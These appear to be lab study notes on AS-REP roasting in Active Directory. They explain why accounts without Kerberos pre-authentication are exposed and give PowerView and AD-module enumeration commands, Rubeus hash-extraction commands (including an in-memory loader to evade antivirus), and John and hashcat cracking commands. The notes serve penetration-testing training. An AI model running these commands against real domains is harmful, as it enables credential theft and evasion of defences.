AS-REP Roasting Attack

What is AS-REP Roasting Attack?

AS-REP Roasting is a technique that targets users who do not require Kerberos pre-authentication. Normally, a user must encrypt a timestamp with their password hash to prove their identity (AS-REQ). However, if the "Do not require Kerberos preauthentication" flag is set, the Domain Controller sends an AS-REP response containing a piece of data encrypted with the user's password hash to anyone who asks. This can be captured and cracked offline. Key Concepts

Pre-Authentication: A security feature that prevents offline password guessing by requiring the user to prove they know their password before the KDC issues a ticket.

DONT_REQ_PREAUTH: An attribute in the userAccountControl (UAC) field. When enabled, it makes the account vulnerable.

No Domain Privileges Required: Unlike Kerberoasting, if you have network connectivity to the DC, you can perform this attack without even having a valid domain account (though in the lab we usually do it from our student session).

Enumeration

PowerView

. C:\AD\Tools\PowerView.ps1
# Find users with Pre-Auth Not Required
Get-DomainUser -PreauthNotRequired
Get-DomainUser -PreauthNotRequired | Select-Object samaccountname, useraccountcontrol

AD-Module

Import-Module C:\AD\Tools\ADModule-master\Microsoft.ActiveDirectory.Management.dll
# Filter by the specific UAC bit (65536)
Get-ADUser -Filter 'DoesNotRequirePreAuth -eq $True' -Properties DoesNotRequirePreAuth

Hash Extraction

Rubeus (Direct)

# Extract hashes for all vulnerable users in the current domain
C:\AD\Tools\Rubeus.exe asreproast /format:hashcat /outfile:C:\AD\Tools\asrep_hashes.txt

# Target a specific user
C:\AD\Tools\Rubeus.exe asreproast /user:sqladmin /format:hashcat

Rubeus (Loader)

# Execution in memory to bypass basic AV
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asreproast /format:hashcat /outfile:C:\AD\Tools\asrep_hashes.txt

OPSEC

Authentication Logs: Even though it's "roasting", the DC logs a 4768 event (TGT Request). Multiple requests for different users might look suspicious.

Unauthenticated Access: In a real scenario, this is often the "entry point" to the domain if you find a username but have no password.

Cracking Offline

John the Ripper

C:\AD\Tools\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=C:\AD\Tools\passwords.txt C:\AD\Tools\asrep_hashes.txt

Hashcat

# Mode 18200 is for Kerberos 5 AS-REP etype 23 (RC4)
hashcat -m 18200 -a 0 asrep_hashes.txt wordlist.txt